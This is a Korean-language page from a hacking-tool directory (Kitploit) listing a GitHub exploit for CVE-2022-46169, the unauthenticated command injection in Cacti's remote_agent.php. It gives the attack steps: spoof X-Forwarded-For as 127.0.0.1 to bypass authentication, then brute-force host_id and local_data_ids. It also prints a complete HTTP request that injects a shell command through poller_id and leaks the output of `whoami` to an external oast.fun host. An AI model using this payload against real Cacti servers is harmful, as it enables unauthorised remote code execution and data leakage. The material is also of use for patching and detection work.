Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-46169 — CVE-2022-46169 Cacti remote_agent.php 인증되지 않은 명령 주입. | Kitploit
도구/GitHubGitHub/0xf4n9x/cve-2022-46169
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlAuthentication
GitHub0xf4n9x/cve-2022-46169

CVE-2022-46169

CVE-2022-46169 Cacti remote_agent.php 인증되지 않은 명령 주입.

저장소 보기
471223년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-46169

CVE-2022-46169 Cacti remote_agent.php 인증되지 않은 명령어 주입.

인증 우회

인증을 우회하려면 X-Forwarded-For 헤더를 추가하십시오. 단, 그 값은 고정된 값이 아닙니다.

image

image

무차별 대입

Burp Intruder를 사용하여 host_id와 local_data_ids의 값을 퍼즈 테스트합니다.

image

image

원격 코드 실행 (RCE)

명령어 주입 지점은 poller_id 매개변수입니다.

root@kitploit:~
GET /cacti/remote_agent.php?action=polldata&poller_id=;ping%20-c%202%20`whoami`.ccsy8s32vtc0000x5nagg8rkyboyyyyyc.oast.fun&host_id=2&local_data_ids[]=6 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close
X-Forwarded-For: 127.0.0.1


image

참고

  • https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf
도구 다운로드